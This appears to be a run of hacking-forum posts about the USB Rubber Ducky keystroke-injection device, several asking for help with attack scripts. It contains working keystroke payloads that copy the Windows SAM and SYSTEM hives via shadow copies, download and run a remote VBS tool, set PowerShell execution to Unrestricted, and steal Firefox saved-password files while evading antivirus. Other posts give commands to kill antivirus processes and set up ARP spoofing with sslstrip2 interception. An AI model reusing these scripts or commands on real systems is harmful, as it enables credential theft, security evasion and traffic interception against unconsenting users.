[automatic driver install failed. is there a fix?]

That might be the issue, plug it in and open device manager. It should show it with a yellow exclamation point. Right click it and "Uninstall" and also uninstall drivers. Reboot and try the ducky again.

i clicked uninstall but there was no option to delete the drivers. i then rebooted. that didn't fix it.

[automatic driver install failed. is there a fix?]

Have you done any HID changes to it? Is this a recent purchase? Please explain more on events that lead up to this. The ducky should install automatically with default drivers without any issues.

no i havn't made any hid changes and no it's not a recent purchase. the ducky still works properly on another pc. what caused this problem was me unplugging the ducky while it was in the middle of automatically installing the driver.

[automatic driver install failed. is there a fix?]

i unplugged my ducky while it was automatically installing the drivers and from now on the ducky is not recognised. how do i make the ducky go back to automatically installing the drivers without failing?

the error i get is

"device driver software was not successfully installed."

[Steal Firefox Passwords using only Batch bypassing the AV.]

This looks really good, good job. I did some superficial research on IE, and it appears that it stores the passwords in the registry. Could be a little more involved to extract such information, and hopefully the pass recovery tools would be able to accept the extracted data. You may have to read the values back into the registry on another computer in order to extract the passwords with a password tool. It should be possible to save as .reg files elsewhere. I am not a registry savant. I don't know though. I was looking at this site;

http://www.majorgeeks.com/content/page/how_to_manage_your_internet_explorer_saved_passwords.html

I think my Win 7 registry is set up a little bit different however, so you would need different payloads for XP, Win 7, and Win 8, or some sort of if statement within the script in order to preform the right operations.

in windows 7, i can get internet explorer 7, 8, 9 and 10 passwords.

[Auto detect OS and choose appropriate payload?]

is there a realease date for this os fingerprinting on the c_duck twin duck firmware?

[Retrieve SAM file not working. Please help.]

i got it to work with the first one. i just had to replace the line with config-e466a.ps1 to config.ps1

[is there a release date for os fingerprinting?]

is there a release date for os fingerprinting firmware for twin duck?

[How can I make the Ducky kill AV?]

You need to know the process name (e.g. for Microsoft Security Essentials, process is "msseces.exe" in task manager) and if it requires administrative privileges to kill the task. You can then proceed to do this with the cmd command

'taskkill /id "msseces.exe" /f /t'

That will kill the given process. If you need admin privileges, you need to make the rubber ducky start cmd with administrator privileges. See examples at USBRubberDucky.com.

NOTE: Some AV's are persistent. It may benefit you trying to open a given AV using the keyboard, then navigating to "Realtime Protection" turning that off, then once the script has executed, turn Realtime Protection back on again.

that didn't work on the current version of avg.

[How can I copy NTUSER.DAT using system shadowcopy in a script?]

I don't know how to use the shadowcopy, however you could just initiate a copy /b in a command prompt to whatever directory you want.

E.g.

copy /b %userprofile%\NTUSER.DAT E:\NTUSER.DAT

that did not work because the file is in use by another program. anyways i figured it out using system shadow copy.

[Sslstrip2 not working. Please help.]

wireshark didn't tell me anything. thanks for nothing.

[Portable Pocket Sized Linux computer?]

asus eeepc 900

[Sslstrip2 not working. Please help.]

The point is that, at least Firefox honors the HSTS header, meaning that now that it has accessed Facebook over https once, it will continue to do so for the next year or so immediately, without first going the HTTP route (sslstrip works by MITM-ing the machine on its initial connection, which always defaults to using HTTP. When the initial connection goes straight for HTTPS, it can't do anything).

can you try sslstrip2 and see what is causing the problem?

[Sslstrip2 not working. Please help.]

i used internet explorer and firefox. yes my machine did have access to the machine when i used sslstrip1 and worked.

[ARP Spoof not working. It delivers a DoS instead. What am I doin' wrong?]

I tried that but the webpage won't load. Maybe the problem is with sslstrip2 and not arpspoof.

Check the man page for arpspoof and try again.

It should probably be something like:

arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1

[Sslstrip2 not working. Please help.]

i installed sslstrip2 and dns2proxy and python 2.7.3
and i did the ip forwarding with the recommend iptables as it shows in the manual

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables-t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000

iptables-t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

after running python sslstrip.py -l 9000 and arp -i wlan0 target_ip gateway_ip and python dns2proxy.py
i went to my test machine and try hotmail.com; google.com; facebook.com ....
sslstrip2 is changing the url but the webpage wont load. can anyone tell me how to fix this?

these are the links that i downloaded from.
https://github.com/singe/sslstrip2
https://github.com/singe/dns2proxy

[SSLStrip not working]

Sslstrip2 bypasses HSTS.

[ARP Spoof not working. It delivers a DoS instead. What am I doin' wrong?]

arpspoof -i wlan0 -r 192.168.0.2(target) -t 192.168.0.1(gateway)

[ARP Spoof not working. It delivers a DoS instead. What am I doin' wrong?]

ARP Spoof not working. It delivers a DoS instead. What am I doin' wrong?

In Kali Linux:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "1" > /proc/sys/net/ipv4/ip_forwarding

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

[Retrieve SAM file not working. Please help.]

Hi,

I use the first one and it works (Using the twin duck). The only problem I had is that the keyboard layout had errors. This caused the rubber to not write the correct letters. What language are you using?

I am using english on a us keyboard. For the first script I did not see any sam file in the userprofile directory.

[How can I copy NTUSER.DAT using system shadowcopy in a script?]

How can I copy NTUSER.DAT using system shadowcopy in a ducky script?

the file is in located in %userprofile%\NTUSER.DAT or (c:\users\<username here>\NTUSER.DAT)

[Retrieve SAM file not working. Please help.]

I tried both of the following scripts but they aren't working. Can someone please fix these or provide another way to use Systemshadowcopy?

DELAY 1150
GUI r
DELAY 1150
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 1150
ALT y
DELAY 1150
ENTER
ALT SPACE
DELAY 1150
STRING m
DELAY 1150
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item  ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER 
STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible')
ENTER
STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }
ENTER
STRING $addSlash  = $shadow.DeviceObject + ''
ENTER
STRING cmd /c mklink C:\shadowcopy $addSlash
ENTER
STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir
ENTER
STRING Remove-Item -recurse -force 'C:\shadowcopy'
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $usbPresent = 'False'
ENTER
STRING do {
ENTER
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'null' } | Measure
ENTER
STRING if ($present.Count -ge 1){
ENTER
STRING $usbPresent = 'True' }Else {
ENTER
STRING $usbPresent = 'False'}}
ENTER
STRING until ($usbPresent -eq 'True')
ENTER
STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'null' } | select Name
ENTER
STRING move-item c:\Windows\Report.zip $driveLetter.Name
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY  1150
STRING C:\Windows\config-e466a.ps1
ENTER
DELAY 1150
ALT F4
DELAY 1150
GUI r
DELAY 1150
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1150
ALT y
DELAY 1150
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 1150
STRING m
DELAY 1150
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1150
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
STRING cd <DIRECTORY TO SAVE SAM AND SYSTEM TO>
ENTER
DELAY 200
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing 
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs
ENTER
DELAY 800
STRING del download.vbs
ENTER
DELAY 800
STRING cscript vssown.vbs /start
ENTER
DELAY 800
STRING cscript vssown.vbs /create
ENTER
DELAY 800
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .
ENTER
DELAY 800
STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .
ENTER
DELAY 800
STRING cscript vssown.vbs /stop
ENTER
DELAY 800
STRING del vssown.vbs
ENTER
STRING exit
ENTER
REM Make sure to change the DIRECTORY above.

[How can I make the Ducky kill AV?]

Not sure if this is what you want but if you look at the killav.rb script in meterpeter it might give you an idea how to so this.

http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CGEQFjAJ&url=http%3A%2F%2Fnull-byte.wonderhowto.com%2Fhow-to%2Fhack-like-pro-kill-and-disable-antivirus-software-remote-pc-0141906%2F&ei=za5xVaGUBo-RyATIm4KgCg&usg=AFQjCNGQhyeNFggKVjwpXTX8qMcN32lQBg&sig2=0uTGDuxyyS9SsUdaNP-4rg

Maybe I could kill the processes if I am able to get System Admin privleges in a console but how do I become System Admin? I am only Admin and I don't have enough privledges to stop a service or kill an AV process.

[How can I make the Ducky kill AV?]

I want it to kill my AV and then run Webbrowser Passview.exe

[How can I make the Ducky kill AV?]

Can anyone tell me how I can use the USB Rubber Ducky to kill an Antivirus like AVG without getting Access Denied errors?

[Steal Firefox Passwords using only Batch bypassing the AV.]

This is for stealing firefox passwords using just Batch because it is not detected by AV.

If someone could make Tutorial on how to make a Batch file to steal Internet Explorer passwords using only Batch or Powershell without triggering AV i would appreciate it.

For this you need the Twin Duck firmware.

You also need to label your ducky drive as the word "DUCKY".

DEFAULT_DELAY 75
DELAY 3000
REM get a cmd prompt this way because it's admin:
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
REM the admin part.
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER

REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat contents
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "ducky"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto while1
ENTER
STRING :break
ENTER
REM
REM FINALLY COPY THE FIREFOX STUFF:
STRING mkdir %myd%\firefox\
ENTER
STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\
ENTER
STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\key3.db %myd%\firefox\
ENTER
STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\cert8.db %myd%\firefox\
ENTER
CONTROL z
ENTER
STRING DuckyWait.bat
ENTER

This is not needed but is the .bat file that the Duck creates in the Temp directory.

:while1
for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
if Exist %myd% (
goto break
)
timeout /t 30
goto while1
:break
mkdir %myd%\firefox\
for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\
for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\key3.db %myd%\firefox\
for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\cert8.db %myd%\firefox\

To open and view the passwords just download Passwordfox.exe from the nirsoft site http://www.nirsoft.net/toolsdownload/passwordfox.zip

Manually select the profile folder that just got created in the Duck inside the new Firefox directory.